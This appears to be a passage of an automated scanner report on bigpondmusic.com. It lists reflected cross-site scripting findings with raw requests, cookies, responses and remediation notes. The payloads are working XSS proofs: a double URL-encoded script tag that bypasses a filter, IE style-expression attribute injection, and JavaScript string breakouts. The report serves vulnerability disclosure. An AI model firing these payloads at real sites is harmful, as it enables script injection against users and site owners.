HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87945
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd4a2'%3b26b7643601d was submitted in the REST URL parameter 2. This input was echoed as bd4a2';26b7643601d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Vouchers/GiftBoxSelectorbd4a2'%3b26b7643601d HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87855
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc45bc0d49 was submitted in the REST URL parameter 2. This input was echoed as e6c7e"><script>alert(1)</script>1cc45bc0d49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vouchers/GiftBoxSelectore6c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc45bc0d49 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87909
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b383'%3b9a24d6a46d7 was submitted in the REST URL parameter 1. This input was echoed as 5b383';9a24d6a46d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album5b383'%3b9a24d6a46d7/angus-julia-stone/down-the-way HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87992
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2da5f79c49 was submitted in the REST URL parameter 1. This input was echoed as 9ec0c"><script>alert(1)</script>a2da5f79c49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album9ec0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2da5f79c49/angus-julia-stone/down-the-way HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87987
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b13a6"style%3d"x%3aexpression(alert(1))"ea60f3dc6d6 was submitted in the h parameter. This input was echoed as b13a6"style="x:expression(alert(1))"ea60f3dc6d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/angus-julia-stone/down-the-way?h=598216448b13a6"style%3d"x%3aexpression(alert(1))"ea60f3dc6d6 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:19:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123630
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Angus & Julia Stone - Do ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/angus-julia-stone/down-the-way?h=598216448b13a6"style="x:expression(alert(1))"ea60f3dc6d6" /> ...[SNIP]...
2.26. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/angus-julia-stone/down-the-way
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94180"style%3d"x%3aexpression(alert(1))"cea24253dac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94180"style="x:expression(alert(1))"cea24253dac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/angus-julia-stone/down-the-way?94180"style%3d"x%3aexpression(alert(1))"cea24253dac=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:19:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 123472
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Angus & Julia Stone - Do ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/angus-julia-stone/down-the-way?94180"style="x:expression(alert(1))"cea24253dac=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a58b'%3b1ecb978a1bf was submitted in the REST URL parameter 1. This input was echoed as 4a58b';1ecb978a1bf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album4a58b'%3b1ecb978a1bf/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:21:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88067
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30492%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85c7280a885 was submitted in the REST URL parameter 1. This input was echoed as 30492"><script>alert(1)</script>85c7280a885 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album30492%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85c7280a885/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:21:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88040
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.29. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1867"style%3d"x%3aexpression(alert(1))"928c28e0869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1867"style="x:expression(alert(1))"928c28e0869 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection?f1867"style%3d"x%3aexpression(alert(1))"928c28e0869=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:21:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 152745
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd04fe20e3c was submitted in the REST URL parameter 1. This input was echoed as fd217"><script>alert(1)</script>fd04fe20e3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumfd217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd04fe20e3c/bruno-mars/just-the-way-you-are HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88047
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d12f4'%3bae96ba96e95 was submitted in the REST URL parameter 1. This input was echoed as d12f4';ae96ba96e95 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumd12f4'%3bae96ba96e95/bruno-mars/just-the-way-you-are HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87936
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fcf3"style%3d"x%3aexpression(alert(1))"a271f02fb84 was submitted in the h parameter. This input was echoed as 4fcf3"style="x:expression(alert(1))"a271f02fb84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/bruno-mars/just-the-way-you-are?h=7161732784fcf3"style%3d"x%3aexpression(alert(1))"a271f02fb84 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 100921
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Bruno Mars - Just The Way Yo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are?h=7161732784fcf3"style="x:expression(alert(1))"a271f02fb84" /> ...[SNIP]...
2.33. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/bruno-mars/just-the-way-you-are
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b916"style%3d"x%3aexpression(alert(1))"908c6cd8987 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b916"style="x:expression(alert(1))"908c6cd8987 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/bruno-mars/just-the-way-you-are?2b916"style%3d"x%3aexpression(alert(1))"908c6cd8987=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 100834
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Bruno Mars - Just The Way Yo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are?2b916"style="x:expression(alert(1))"908c6cd8987=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98124%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a41ace4660 was submitted in the REST URL parameter 1. This input was echoed as 98124"><script>alert(1)</script>9a41ace4660 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album98124%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a41ace4660/cheryl-cole/promise-this2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:24:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88229
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ea10'%3b746216d7018 was submitted in the REST URL parameter 1. This input was echoed as 8ea10';746216d7018 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
